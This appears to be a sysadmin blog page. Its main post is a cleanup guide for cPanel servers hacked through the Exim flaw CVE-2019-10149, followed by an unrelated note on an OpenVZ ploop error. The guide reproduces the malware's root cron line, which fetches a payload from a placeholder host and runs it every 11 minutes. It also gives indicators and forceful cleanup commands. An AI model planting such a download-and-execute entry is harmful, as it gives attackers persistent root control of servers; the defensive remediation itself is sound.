How to clean up a hacked server from the Exim vulnerability CVE-2019-10149 | Temporary workaround | cPanel

The recently reported vulnerability CVE-2019-10149, affecting Exim versions 4.87 through 4.91, is very severe. Many servers have already been hacked by now. If your server is still clean by God's grace but running a vulnerable Exim on an outdated cPanel version, it is highly recommended to upgrade cPanel immediately so that Exim gets patched to version 4.92.

The solution to avoid such a hack is to upgrade cPanel to the latest version. See:

https://documentation.cpanel.net/display/CKB/CVE-2019-10149+Exim

https://access.redhat.com/security/cve/cve-2019-10149
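
For a server that is still clean, the upgrade can be kicked off from the shell (the same cPanel script is used again in the recovery steps further below):

# /scripts/upcp --force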

Since the above URLs already cover the solution for clean servers (patch Exim and avoid the hack), I made this document for the unfortunate people whose servers are already root-hacked through the reported Exim vulnerability.

Perform the following steps as a temporary workaround to clean up a compromised server and at least get its services back up for your customers. This is not a permanent solution: once the cleanup is done, set up a clean server with the same specification and service configuration, with the latest cPanel and Exim, and then migrate the user accounts from the hacked (and cleaned-up) server to the new one.

An important thing to note: DO NOT SSH FROM THE HACKED SERVER TO THE NEW DESTINATION SERVER IN ANY CASE, as that will probably let the new server get infected as well. Always connect from the new server to the hacked source server using the WHM Transfer Tool.

Signs of the hacked server from this Exim vulnerability CVE-2019-10149:

# crontab -l
*/11 * * * * root tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; (${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://URL/src/ldm -o /root/.cache/.ntp||${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://URL/src/ldm -o /root/.cache/.ntp||${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://URL/src/ldm -o /root/.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://URL/src/ldm -O /root/.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://URL/src/ldm -O /root/.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://URL/src/ldm -O /root/.cache/.ntp) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/.ntp
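
In short, this cron entry runs every 11 minutes as root: it locates working curl and wget binaries (falling back to scanning binaries alongside passwd with strings), rewrites /etc/hosts if it contains any .onion entries, downloads the attacker's payload to /root/.cache/.ntp, marks it executable, and runs it.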

File: /usr/bin/[kthrotlds] [ Not normally found on clean servers ]
Size: 1738544 (1697.796875) [ - Most system files/libraries are less than 25k. Anything larger should be considered suspicious. ]
Changed: Tue Jun 11 19:36:58 2019 [ Approximate date the compromise may have occurred ]
RPM Owned: No - Most system files should be owned by an RPM
sha256sum: c3f26f38cb75cf779eed36a4e7ac32cacd4ae89bdf7dae2a4c4db1afe652d3f0

# crontab -e
crontab: installing new crontab
crontab: error renaming /var/spool/cron/#tmp.XXXXuRviCS to /var/spool/cron/root
rename: Operation not permitted
crontab: edits left in /tmp/crontab.6k7Xnz

# crontab -e
lstat: No such file or directory

The crontab errors above occur because the malware has set the immutable (i) attribute on the root cron file, as lsattr confirms:

# lsattr /var/spool/cron/root
----i--------e-- /var/spool/cron/root

# exim -bV
Exim version 4.91 #1 built 07-Mar-2019 22:58:08
Copyright (c) University of Cambridge, 1995 - 2018
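
To sweep a server quickly for these indicators, a few shell checks can help. This is only a sketch based on the artifacts listed above, not a full scanner:

# Sweep for known CVE-2019-10149 compromise artifacts (sketch)
for f in '/usr/bin/[kthrotlds]' /root/.cache/.ntp /root/.cache/.kswapd; do
    [ -e "$f" ] && echo "Suspicious file present: $f"
done
ps -ef | grep '[k]throtlds'                                # malware process, if running
lsattr /var/spool/cron/root /etc/cron.d/root 2>/dev/null   # watch for the 'i' (immutable) flag
crontab -l 2>/dev/null | grep -q '/root/.cache/.ntp' && echo "Malicious root cron entry present"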

Here are the steps to clean up the hacked server from the Exim vulnerability CVE-2019-10149:

# service exim stop;chkconfig exim off (::stop the exim service fully)
# yum remove exim -y (::remove it if it keeps coming back online)
# service crond stop
# service cron stop
# killall -9 kthrotlds
# killall -9 curl wget sh
# yum -y reinstall curl
# exim -bp | exiqgrep -i | xargs exim -Mrm
# rm -fv /root/.cache/.ntp
# chattr -V -ie /etc/cron.d/root
# > /etc/cron.d/root
# chattr -V -ie /var/spool/cron/root
# > /var/spool/cron/root
# chattr -V -ie /etc/cron.daily/cronlog /etc/cron.d/root /etc/cron.d/.cronbus /etc/cron.hourly/cronlog /etc/cron.monthly/cronlog /var/spool/cron/root /var/spool/cron/crontabs/root /etc/crontab /root/.cache/ /root/.cache/a /usr/local/bin/nptd /root/.cache/.kswapd /usr/bin/\[kthrotlds\] /root/.ssh/authorized_keys /.cache/* /.cache/.sysud /.cache/.a /.cache/.favicon.ico /.cache/.kswapd /.cache/.ntp >/dev/null 2>&1
# chattr -V -ie /etc/rc.local;chattr -V -ie /root/.ssh/authorized_keys
# sed -i -e '/bin\/npt/d' /etc/rc.local >/dev/null 2>&1
# sed -i -e '/user@localhost/d' /root/.ssh/authorized_keys >/dev/null 2>&1 (::or remove any unusual keys you find there)
# service crond start >/dev/null 2>&1
# service cron start >/dev/null 2>&1

Make sure the compromise does not come back. If it does, repeat the above steps once again immediately, since the malware is still resident in the server's memory. A better way is to create a bash script, say hackclean.sh, containing the required commands above in sequence so they can all be executed at once, as sketched below.
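
For reference, here is a minimal sketch of such a hackclean.sh, simply bundling the core cleanup commands above in order (add the optional exim removal and queue purge if you need them):

#!/bin/bash
# hackclean.sh - temporary CVE-2019-10149 cleanup (sketch of the steps above)
service exim stop; chkconfig exim off
service crond stop; service cron stop >/dev/null 2>&1
killall -9 kthrotlds
# NOTE: the manual steps also kill curl/wget/sh; 'sh' is omitted here
# so the script does not kill itself when run via sh.
killall -9 curl wget
yum -y reinstall curl
rm -fv /root/.cache/.ntp
# drop the immutable/extent attributes the malware sets, then empty the crons
chattr -V -ie /var/spool/cron/root /etc/cron.d/root /etc/rc.local /root/.ssh/authorized_keys >/dev/null 2>&1
> /var/spool/cron/root
> /etc/cron.d/root
sed -i -e '/bin\/npt/d' /etc/rc.local >/dev/null 2>&1
sed -i -e '/user@localhost/d' /root/.ssh/authorized_keys >/dev/null 2>&1
service crond start >/dev/null 2>&1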

Once done, reboot the server:

# reboot

Once the server is back online, check whether the hack files listed above are still present. If they are gone, upgrade cPanel, which will also install the latest patched Exim on the server:

# /scripts/upcp --force 


The result should be as follows:

# cat /usr/local/cpanel/version;rpm -qa exim
11.80.0.14
exim-4.92-1.cp1180.x86_64

Later, if you see email delivery issues like the following:

201X-0X-XX 10:28:26 H=mail-XXX-XXXcom [IP.x.x.x]:36085 I=[IP.x.x.x]:25 X=TLSv1.2:ECDHE-RSA-AES128-GCM-SHA256:128 CV=no F=<user@domain1.com> rejected RCPT <user@domain2.com>: Rejected relay attempt: 'IP.x.x.x' From: 'user@domain1.com' To: 'user@domain2.com'
201X-0X-XX 10:28:27 H=mail-XXX-XXXcom [IP.x.x.x]:36085 I=[IP.x.x.x]:25 Warning: "Detected session with all messages failed"
201X-0X-XX 10:28:27 H=mail-XXX-XXXcom [IP.x.x.x]:36085 I=[IP.x.x.x]:25 Warning: "Increment slow_fail_block Ratelimit - mail-XXX-XXXcom [IP.x.x.x]:36085 because of all messages failed"

This is probably happening because the files /etc/localdomains and /etc/remotedomains are missing their contents. Repopulate them by running the following cPanel script:

# /scripts/checkalldomainsmxs --yes

Restart exim if required.
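
On cPanel servers, Exim can be restarted with its restartsrv wrapper script:

# /scripts/restartsrv_exim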

Please keep in mind that the above steps are not a permanent solution but a temporary workaround to keep things online while you migrate the accounts to a clean server and reinstall the hacked one.

OpenVZ vps creation “Error in check_mount_restrictions (ploop.c:1627)”

I wasn’t able to create a new VPS on a node due to the following ploop error.

From the log
—————————
Creating image: /vz/private/350.tmp/root.hdd/root.hdd size=2306867K
Creating delta /vz/private/350.tmp/root.hdd/root.hdd bs=2048 size=4614144 sectors v2
Storing /vz/private/350.tmp/root.hdd/DiskDescriptor.xml
Error in check_mount_restrictions (ploop.c:1627): The ploop image can not be used on ext3 or ext4 file system without extents
Failed to create image: Error in check_mount_restrictions (ploop.c:1627): The ploop image can not be used on ext3 or ext4 file system without extents [21]
Destroying container private area: /vz/private/350
Creation of container private area failed

—————————

Check whether the partition is on an ext4 filesystem or not. Ploop doesn’t work on an ext3 filesystem. My node’s /vz partition was on ext3.
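
One quick way to check the filesystem type of the /vz partition:

# df -T /vz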

We cannot simply upgrade the /vz partition from ext3 to ext4, as lots of VPSes are already running on it. I checked the vzctl version and found it was the latest one, 4.7.x:

# vzctl --version
vzctl version 4.7.1

The latest vzctl tries to create containers with the ploop layout, which is more advanced than simfs. Since the partition runs on an ext3 filesystem, the safest way to fix the issue is to downgrade vzctl to version 4.5.x.
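
For what it's worth, vzctl 4.x should also let you force the old simfs layout per container with the --layout option (or globally via VE_LAYOUT=simfs in /etc/vz/vz.conf), but the downgrade described below is the route I took:

# vzctl create 350 --ostemplate centos-6-x86_64-cpanel --layout simfs --private /vz/private/350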

Version 4.5.1 is not available in the OpenVZ repositories anymore. You may need to manually download the vzctl and vzctl-core RPMs from https://openvz.org/Download/vzctl/4.5.1 and install them.

Before installing them, remove the current vzctl 4.7.x:

# yum remove vzctl
# cd /usr/src
# wget http://download.openvz.org/utils/vzctl/4.5.1/vzctl-4.5.1-1.x86_64.rpm
# wget http://download.openvz.org/utils/vzctl/4.5.1/vzctl-core-4.5.1-1.x86_64.rpm

# rpm -Uvh vzctl-core-4.5.1-1.x86_64.rpm
Preparing... ########################################### [100%]
1:vzctl-core ########################################### [100%]

# rpm -Uvh vzctl-4.5.1-1.x86_64.rpm
Preparing... ########################################### [100%]
1:vzctl ########################################### [100%]
vz-postinstall: /etc/sysctl.conf: add net.bridge.bridge-nf-call-ip6tables = 1
vz-postinstall: /etc/sysctl.conf: add net.bridge.bridge-nf-call-iptables = 1
#

# vzctl --version
vzctl version 4.5.1

Create container now 🙂

# vzctl create 101 --ostemplate centos-6-x86_64-cpanel --private /vz/private/101 --root=/vz/root/101 --config configname
Creating container private area (centos-6-x86_64-cpanel)
Performing postcreate actions
CT configuration saved to /etc/vz/conf/101.conf
Container private area was created